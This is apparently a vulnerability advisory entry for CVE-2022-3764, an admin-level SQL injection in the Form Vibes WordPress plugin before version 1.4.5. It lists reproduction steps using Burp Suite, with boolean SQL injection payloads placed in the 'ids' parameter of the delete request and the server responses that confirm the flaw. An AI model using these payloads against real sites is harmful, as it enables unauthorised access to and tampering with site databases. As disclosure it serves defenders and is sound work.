Lucene search
Nguyen Duy Quoc KhanhWPEX-ID:9D49DF6B-E2F1-4662-90D2-84C29C3B1CB0HistoryNov 08, 2022 - 12:00 a.m.
Form Vibes < 1.4.5 - Admin+ SQLi
2022-11-0800:00:00
Nguyen Duy Quoc Khanh
196
form vibes
contact form 7
sql injection
burp suite
dashboard
submission
intercept
parameter manipulation
repeater.
0.001 Low
EPSS
Percentile
19.5%
The “delete_entries” function does not filter parameters from the request. This leads to an SQL Injection vulnerability.
- Create a submission using the Contact From 7 plugin.
- On the Form Vibes tab in the dashboard, click "submissions" and implement the delete function on an entry.
- Intercept the request and send it to repeater in Burp suite.
- Change the parameter "params" to: {"ids":["9) AND (1=2);-- -"]}
- Send the request, we get this response: {"status":"failed","message":"Could not able to delete Entries"}
- Change the parameter "params" to: {"ids":["9) AND (1=1);-- -"]}
- Send the request, the response this time is the following: {"status":"passed","message":"Entries Deleted"}
Related
wpvulndb
wpvulndb
Form Vibes < 1.4.5 - Admin+ SQLi
2022-11-08 00:00:00
cve
cve
CVE-2022-3764
2024-01-16 16:15:10
prion
prion
Sql injection
2024-01-16 16:15:00
cvelist
cvelist
CVE-2022-3764 Form Vibes < 1.4.5 - Admin+ SQLi
2024-01-16 15:50:50
nvd
nvd
CVE-2022-3764
2024-01-16 16:15:10